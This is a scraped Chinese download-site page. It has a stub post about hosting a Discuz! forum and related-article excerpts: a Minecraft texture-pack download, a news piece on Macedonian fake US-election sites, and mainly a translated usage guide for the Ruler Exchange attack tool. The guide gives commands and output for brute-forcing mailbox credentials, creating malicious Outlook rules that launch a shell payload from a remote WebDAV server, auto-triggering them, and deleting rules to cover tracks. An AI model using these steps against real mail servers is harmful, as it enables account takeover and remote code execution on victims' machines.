首页
Windows
AI应用
音乐
视频
图片
系统
编程
游戏
安全
网络
维护
优化
刻录解压
浏览器
组件
效率
Android
应用推荐
游戏推荐
电视应用
Tool kit
HTML源码
编程开放
安全软件
远程控制
分析/安全
自学教程
linux软件
Fusion app源码
PHP源码
艺术
每日一知
我的世界
手机游戏
电脑游戏
网站推荐
桌面壁纸
头像
✨探索
个人资料
发表帖子
退出登录
剑客网
免费在线搭建Discuz!论坛
2016年10月20日
0条评论
免费在线搭建Discuz!论坛
内容
相关
地址:
//www.5d6b.com
作者信息
江湖剑客
3580篇文章
730条评论
TA主页
联系Ta
描述:
一起用互联网帮助更多人
本文标签:
本文链接:免费在线搭建Discuz!论坛 - http://www.go176.net/post-760.html
相关文章
Silentbreak对该攻击行为的研究非常到位,给我们带来了极大的便利。唯一的缺点是它的安装时间过长。复制邮箱到一个新的Outlook实例比较耗时。创建邮件规则也相对麻烦。那么有人可能会问,难道就没有更好的payload生成器么?因此Ruler就这样诞生了。 Ruler的实现方式和MAPI的相关资料请参见博客:SensePostblog 运行demo的链接地址:Ruler onYouTube 它能做什么? Ruler包含多种已经实现的和正在研发或计划研发的功能,包括: 枚举有效用户 查看当前配置邮件规则 创建新的恶意邮件规则 删除邮件规则 当与Exchange交互并使用自动发现服务(与Outlook客户端一样)发现相关信息时,Ruler会处于半智能状态。 获取代码 Ruler是用Go语言编写的,因此你需要有GO语言环境来运行并创建相关项目。第一步是克隆它的仓库。 git clone https://github.com/sensepost/ruler.git 或者你可以直接通过Go命令获取。 go get github.com/sensepost/ruler 如果你想运行这个APP的话请使用 go run go run ruler.go –h 或直接创建一个(首选): go build 与Exchange交互 它目前与用于OutlookAnywhere的新版 MAPI/HTTP 协议兼容,且可能与被 MAPI 取代的旧版 RPC/HTTP 协议存在不兼容的情况。 凭证的暴力破解 如果你走暴力破解的路线,那么Ruler绝对是你的菜。它有一个内置的暴力破解工具,能够做寻找凭证这项半智能的工作。 ./ruler -domain targetdomain.com -brute -usernames/path/to/user.txt -passwords /path/to/passwords.txt 你应该看得到你正在运行的暴力破解过程: ./ruler -domain evilcorp.ninja -brute -usernames~/users.txt -passwords ~/passwords.txt -delay 0 -v -insecure [*] Starting bruteforce [x] Failed: cindy.baker:P@ssw0rd [x] Failed: henry.hammond:P@ssw0rd [x] Failed: john.ford:P@ssw0rd [x] Failed: cindy.baker:August2016 [x] Failed: henry.hammond:August2016 [+] Success: john.ford:August2016 [*] Multiple attempts. To prevent lockout - delaying for0 minutes. [x] Failed: cindy.baker:Evilcorp@2016 [x] Failed: henry.hammond:Evilcorp@2016 [x] Failed: cindy.baker:3V1lc0rp [x] Failed: henry.hammond:3V1lc0rp [*] Multiple attempts. To prevent lockout - delaying for0 minutes. [x] Failed: henry.hammond:Password1 [+] Success: cindy.baker:Password1 [x] Failed: henry.hammond:Password!2016 [*] Multiple attempts. To prevent lockout - delaying for0 minutes. [x] Failed: henry.hammond:SensePost1 [x] Failed: henry.hammond:Lekker [*] Multiple attempts. To prevent lockout - delaying for0 minutes. [x] Failed: henry.hammond:Eish 或者,你可以使用-userpass选项指定用户传递文件。 用户传递文件应以冒号分隔,每行一对凭证: $ cat userpass.txt john.ford:August2016 henry.hammond:Password!2016 cindy.baker:Password1 ./ruler -domain evilcorp.ninja -brute -userpassuserpass.txt -v -insecure [*] Starting bruteforce [+] Success: john.ford:August2016 [x] Failed: henry.hammond:Password!2016 [+] Success: cindy.baker:Password1 还有其它的一些参数与-brute协同工作,包括: -stop //在第一个有效的用户名上停止:密码combo -delay //多次密码猜测之间的停留时间间隔 -attempts //在停留之前需要进行几次尝试(每个用户的尝试次数) -insecure //当Exchange服务器有一个坏的SSL证书时 -v //详细地显示失败的尝试 自动发现服务(The autodiscover service) 尽管Ruler在“自动发现”必要设置上作出了很大的努力,但你仍然可能会遇到失败的情况。一般原因有以下几点: 自动发现http/非https上的部署(我们默认https是更为普遍的情况) 无自动发现DNS记录 身份验证失败 若你碰到使自动发现服务崩溃的Exchange服务器,你可以手动设置自动发现的目标URL: ./ruler -url//autodiscover.somedomain.com/autodiscover/autodiscover.xml 若碰到身份验证问题(并且确定登录凭证正确无误),你可以尝试强制使用-basic进行基本身份验证。 -v flag同样能给你一些自动发现服务所使用进程的提示。 显示现有规则/账户验证 只要有一组凭证,你就可以以该用户的邮箱为目标,但我们需要知道该用户的邮箱地址(邮箱地址簿搜索功能已列入研发计划) ./ruler -domain targetdomain.com -emailuser@targetdomain.com -user username -pass password –display 输出: ./ruler -domain evilcorp.ninja -user john.ford -passAugust2016 -email john.ford@evilcorp.ninja -display -insecure [*] Retrieving MAPI info [*] Doing Autodiscover for domain [+] MAPI URL found: //mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja [+] User DN: /o=Evilcorp/ou=Exchange Administrative Group(FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford [*] Got Context, Doing ROPLogin [*] And we are authenticated [+] Mailbox GUID: [251 102 208 159 53 202 228 77 184 67 76 15 228 47 61 223] [*] Openning the Inbox [+] Retrieving Rules [+] Found 0 rules 删除现有规则(清理痕迹) 例如:通过模糊匹配000000df1(规则名称附近的ruleId)来删除相应规则 ./ruler -domain targetdomain.com -emailuser@targetdomain.com -user username -pass password -delete 000000df1 反弹shell 现在到最有意思的部分了。你的初始设置和Silentbreak博客所述的是一样的,设置您的控制端服务器来承载您的payload。 创建新的规则用户Ruler以及: ./ruler -domain targetdomain.com -emailuser@targetdomain.com -user username -pass password -loc"\\\\yourserver\\webdav\\shell.bat" -trigger "pop a shell"-rule maliciousrule 各个部分: -loc 表示远程shell的位置,连接远程shell时请注意使用双斜杠\(或者c:/Windows/system32/calc.exe) -trigger 表示主题中你想用来触发规则的命令 -rule 表示你所创建规则的名称 输出: [*] Retrieving MAPI info [*] Doing Autodiscover for domain [+] MAPI URL found: //mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja [+] User DN: /o=Evilcorp/ou=Exchange Administrative Group(FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford [*] Got Context, Doing ROPLogin [*] And we are authenticated [+] Mailbox GUID: [251 102 208 159 53 202 228 77 184 67 76 15 228 47 61 223] [*] Openning the Inbox [*] Adding Rule [*] Rule Added. Fetching list of rules... [+] Found 1 rules Rule: shell RuleID: 01000000127380b1 现在你可以发一封邮件给你的目标,并且将执行代码写在邮件的主题行中。从测试邮件规则开始都是同步发送的,因此在通常的情况下假设目标的outlook处于打开并联网的状态,你应该能够立即获取对方的shell。 半自动化攻击(Semi-Autopwn) 如果你想实现自动化地触发规则,Ruler能利用用户自己的邮箱在他们的收件箱中创建一个新邮件。也就是说你不再需要向你的攻击目标发送邮件,只要在创建规则时使用-send这个参数即可。你所创建的规则同步需要等待30秒(如果你觉得30秒太长或太短都可以在源码中作出调整),然后通过MAPI发送邮件。 [*] Retrieving MAPI/HTTP info [*] Doing Autodiscover for domain [*] Autodiscover step 0 - URL:https://outlook.com/autodiscover/autodiscover.xml [+] MAPI URL found: //outlook.office365.com/mapi/emsmdb/?MailboxId=0003bffd-fef9-fb24-0000-000000000000@outlook.com [+] User DN: /o=First Organization/ou=Exchange AdministrativeGroup(FYDIBOHF23SPDLT)/cn=Recipients/cn=0003BFFDFEF9FB24 [*] Got Context, Doing ROPLogin [*] And we are authenticated [+] Mailbox GUID: dc561d32a809304b8dbc91cc9f0ae1e2 [*] Openning the Inbox [*] Adding Rule [*] Rule Added. Fetching list of rules... [+] Found 1 rules Rule: autopop RuleID: 010000000c4baa84 [*] Auto Send enabled, wait 30 seconds before sendingemail (synchronisation) [*] Sending email [*] Message sent, your shell should trigger shortly. [*] And disconnecting from server
Ruler:一款利用Exchange服务渗透的安全工具
江湖剑客
2016-10-26
我的世界1.8The Eldpack材质包是一款挺仿古的材质包,像素不高,适合低配电脑的玩家使用。 如果你喜欢我的世界1.8The Eldpack材质包请继续支持Minecraft中文分享站 材质包图片 我的世界1.8The Eldpack材质包下载大小: | 来源:百度网盘(密码qsu9) 已经过安全软件检测无毒,请您放心下载。
我的世界1.8The Eldpack材质包下载
江湖剑客
2016-12-4
看似美国政治新闻网站,实际却是马其顿自媒体 随着一封公开信,东方网与微信平台的纷争成为了媒体关注焦点。国外有没有标题党,有没有传谣骗点击?当然有,比如近期美国大选期间,诸多自媒体通过标题党骗取流量,借助显示广告从中牟利。 2016年的美国总统大选,就像是一面镜子,照出了当今美国社会的割裂现状。希拉里和川普竞选阵营在唇枪舌剑,双方的支持者针锋相对,新闻媒体以及网络黑客不断寻找对方黑点。双方都坚定地认为,对方是有史以来最差的总统候选人。 几乎每一天,都有新的希拉里和川普的负面新闻出现,成为媒体以及社交网站的报道焦点和讨论热点。但在这种迄今最为敌对的竞选氛围中,各种流言和谣言也找到了滋生的土壤。 希拉里和川普的新闻最容易带来流量 希拉里和川普的新闻最容易带来流量 “突发新闻:FBI已经确定希拉里即将定罪”,看到这样的新闻标题,看到Worldpolitcus.com这样的网站,或许很多人都会误以为真,以为希拉里真的因为邮件门丑闻在劫难逃,同时随手转发到Facebook或者Twitter,引发更多人围观与传播。 这条新闻在Facebook上获得了超过14万的转发与评论。然而,这条新闻却是彻头彻尾的谣言,这个网站的运营者也不在美国,而在遥远的欧洲小国马其顿的一个无人知晓的小镇维勒斯(Veles)。这个网站看上去就是建在WordPress博客模版上,而联系方式只有一个Gmail邮箱,实际上就是一家自媒体。 过去的一年,这个仅有几万人的小镇成为了美国政治谣言工厂,出现了至少140个专注美国政治新闻的自媒体网站,而且都起着看起来像是美国网站的名字,例如Worldpolitcus、USADailyPolitics等等。他们的运营者都是一群年轻学生,甚至有的还不到20岁。 不过,这些马其顿年轻人创建美国政治新闻自媒体网站,编造种种以假乱真、耸人听闻的谣言,并不是真的支持川普或者痛恨希拉里。他们的唯一目的就是通过谣言带来网站流量,靠网页上的广告,从谷歌AdSense那里获得广告费。 他们不仅熟悉美国政治和竞选模式,更精通如何通过Facebook进行传播。他们将流量来源寄托在Facebook上,将目标对准美国网民,因为一个美国Facebook用户的价值是非美国用户的四倍。 美国媒体BuzzFeed发现,有超过100家目前还在活跃的美国政治资讯网站是来自这个马其顿小镇,其中最大的网站在Facebook还有自己的主页,拥有数十万粉丝。不过,英国《卫报》的调查显示,这样的网站数量至少超过150家。 这些网站也并不是全是谣言,更多是聚合来自美国右翼和保守派媒体的新闻。当网站编辑找到一篇报道后,就会起一个耸人听闻的误导性标题,然后发到Facebook上进行传播。越多人在Facebook上点击这些新闻进入他们网站,他们就能获得更多的广告营收。 不过,美国本土也有这样的自媒体网站。一个仅有两名员工的网站LibertyWritersNews每月靠网页广告收入就高达1万-4万美元。这个自媒体在Facebook上有15万粉丝,95%的流量都来自于Facebook。他们每月还会支付3000美元在Facebook进行推广,以获得更多的流量。显然,自媒体很知道羊毛出在羊身上的道理。 由于标题党的原因,这些或彻底谣言或平淡无奇的新闻总能带来巨大的点击量。例如一篇典型的标题党文章《希拉里在2013年表示,希望看到川普竞选,因为他诚实又不会被收买》在Facebook上获得了超过48万个转发、互动与评论。实际上,文章内容只是希拉里曾经表示,希望看到更多商界人士参政,根本没有提到川普。 但这样的标题党却能带来传统媒体望尘莫及的流量。相比之下,《纽约时报》关于川普申报9亿美元亏损合法避税二十年的独家头条报道,在Facebook上的这个数据只有17.5万。 虽然Facebook也会对一些认定垃圾信息的自媒体网站进行处理,但大多是限制读者看到这些自媒体的限流处罚。很多自媒体会申请Facebook的媒体认证标示,这样就更有可能避开Facebook的处罚。 这些网站此前也曾经传播过支持民主党初选候选人伯尼·桑德斯(Bernie Sanders)的美国左翼政治资讯,但川普和希拉里的对决才是最吸引网络流量的内容。一位BVANews.com的网站创始人对BuzzFeed透露,美国人就喜欢看和川普有关的新闻。他年初创办这个网站,平均每个月的浏览量有100万。 据这些自媒体编辑透露,由于越来越多的人发现了这个财源,创办了上百家美国政治资讯网站,现在营收已经远不如以前。他们每月的广告费收入是5000美元,特别热门的文章甚至可以每天3000美元的收购。而马其顿2015年的人均国民生产总值只有1.4万美元。 不过,随着美国大选即将落幕,这些马其顿标题党新闻网站也将迎来转型,其中一些人开始打算转向健康主题。显然,这也是一个普通读者最容易引起兴趣的话题。 信息来源://tech.sina.com.cn/i/2016-11-06/doc-ifxxnety7457885.shtml
国外自媒体标题党:编造美国大选谣言骗流量挣广告费
江湖剑客
2016-11-6
×
支付订单